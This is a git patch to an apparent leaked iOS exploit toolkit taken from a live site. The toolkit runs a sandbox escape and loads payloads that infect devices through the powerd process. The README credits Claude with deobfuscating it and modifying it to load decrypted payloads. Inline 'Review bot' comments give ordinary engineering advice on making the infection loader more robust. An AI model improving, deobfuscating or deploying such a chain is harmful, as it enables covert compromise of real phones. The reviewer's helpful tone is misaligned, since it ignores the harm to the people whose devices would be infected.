From cf579abf20d553a0dda6d3ace7878239a00d13bb Mon Sep 17 00:00:00 2001
From: khanhduytran0
Date: Sun, 8 Mar 2026 07:14:53 +0700
Subject: [PATCH] Add confirm dialog back
---
 README.md | 2 +-
 Stage3_VariantB.js | 19 ++++++++++++++++---
 group.html | 4 ++--
 3 files changed, 19 insertions(+), 6 deletions(-)
diff --git a/README.md b/README.md
index 3e4e92d..c12941d 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 The leaked exploit toolkit for various iOS versions. Extracted from `https://sadjd.mijieqi[.]cn/group.html`
-Partially deobfuscated and symbolicated by Claude (thanks @34306 for sponsor) and by hand.
+Partially deobfuscated, symbolicated, and modified to load decrypted payloads by Claude (thanks @34306 for sponsor) and by hand.
 These scripts are modified in a way that allows you to host them locally. Note that this only includes exploit chains for tested devices.
diff --git a/Stage3_VariantB.js b/Stage3_VariantB.js
index 17f81d0..886672d 100644
--- a/Stage3_VariantB.js
+++ b/Stage3_VariantB.js
@@ -1160,6 +1160,7 @@ function YA() {/* Original: YA → resolveSymbols */
 },
 // Fetch a single file as ArrayBuffer
 fetchBin(url) {
+ window.log("Downloading " + url);
 return new Promise((resolve, reject) => {
 const xhr = new XMLHttpRequest();
 xhr.open("GET", url, true);
@@ -1244,6 +1245,18 @@ function YA() {/* Original: YA → resolveSymbols */
 if (lastSlash >= 0) hashName = hashName.substring(lastSlash + 1);
 hashName = hashName.replace(/\.min\.js$/, "").replace(/\.js$/, "");
+ // When we load the metadata, ask user if they want to continue (will infect device)
+ if (hashName === "7a7d99099b035b2c6512b6ebeeea6df1ede70fbb") {
+ let shouldContinue = confirm(
+ "The script is about to load metadata and subsequent payloads to infect your device in `powerd` process.\n" +
+ "Cancel = safely STOP this operation\n" +
+ "OK = continue infect your device");
+ if (!shouldContinue) {
+ window.log("[LOADER] Execution canceled by user.");
+ return;
+ }
+ }
+
 // Fetch decrypted F00DBEEF container from payloads/ directory
 window.log("[LOADER] Loading payload: " + hashName);
 const container = await E.buildContainer(hashName);
@@ -1368,7 +1381,7 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
 for (let _i = 0; _i < _buf.length; _i += 2) _oA += String.fromCharCode(_buf[_i] | ((_buf[_i + 1] || 0) << 8));
 g.oA = _oA;
- window.log("[PATCH] Loaded dylib: " + _buf.length + "B, oA=" + _oA.length +
+ window.log("[PATCH] Loaded bootstrap.dylib: " + _buf.length + "B, oA=" + _oA.length +
 " (orig " + _origLen + "), _process=0x" + _processOff.toString(16));
 // ── END PATCH (redirect applied after buffer is built, below) ──
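Review bot: The consent prompt in the added block is keyed to a single hard-coded name, so any payload whose `hashName` differs is fetched and executed by this loader with no dialog at all; if one prompt before the first infection step is the intent, a one-shot flag is more robust than a name match, e.g. `if (!window.__payloadConfirmed) { /* prompt */ window.__payloadConfirmed = true; }`, and in any case the 40-hex literal deserves a comment saying which file it is (`// name of the metadata bundle; first step that touches powerd`, adjusted to whatever it actually denotes). The cancel path does a bare `return;` from what looks like an async function (`await E.buildContainer` follows), so whoever awaits this call receives `undefined` instead of a container and that caller's handling of it is not visible here; `throw new Error("[LOADER] Execution canceled by user.")` would abort the chain regardless of how the caller treats the result. `confirm()` returns false when the browser suppresses dialogs, so the gate fails closed, which is the right default for this use. The enclosing function starts and ends outside the hunk.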
@@ -1393,12 +1406,12 @@ function executeSandboxEscape() {/* Original: yA → executeSandboxEscape */
 } else {
 window.log("[PATCH] _process at original offset 0x" + _ORIG_PROCESS_OFF.toString(16) + ", no redirect needed");
 }
- window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));
+ //window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));
 const dylibLoadAddressI64 = utilityModule.Int64.fromNumber(dylibLoadAddress),
 dylibDataAddressMaybe = utilityModule.Int64.fromNumber(platformModule.platformState.exploitPrimitive.fakeobj(dylibBuffer));
 window.log("dylib load address: 0x" + dylibLoadAddress.toString(16));
 window.log("data address?: 0x" + dylibDataAddressMaybe.toNumber().toString(16));
- window.log("D: 0x" + dylibSize);
+ window.log("dylib size: 0x" + dylibSize);
 platformModule.platformState.sandboxEscape.Ad(dylibLoadAddressI64, dylibDataAddressMaybe, dylibSize);
 const T = g.YA().ct() + 4;
 //alert("D 0x" + T.toString(16));
diff --git a/group.html b/group.html
index 5ccc271..2be4caa 100644
--- a/group.html
+++ b/group.html
@@ -11,8 +11,8 @@ - - +
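Review bot: Commenting out the `window.addDownloadBinary(...)` call leaves dead code on the new side, and a reader cannot tell whether the dylib dump was retired or is meant to be switched back on for analysis. If it is a debugging aid, gate it on an explicit toggle instead, e.g. `if (window.DUMP_DYLIB) window.addDownloadBinary("lzwDecoded.dylib", new Uint32Array(dylibBuffer.slice(0)));`, otherwise delete the line; the `//alert(...)` three lines below shows the file already tolerates this habit, which is a reason to stop compounding it rather than to follow it. `executeSandboxEscape` starts and ends outside the hunk.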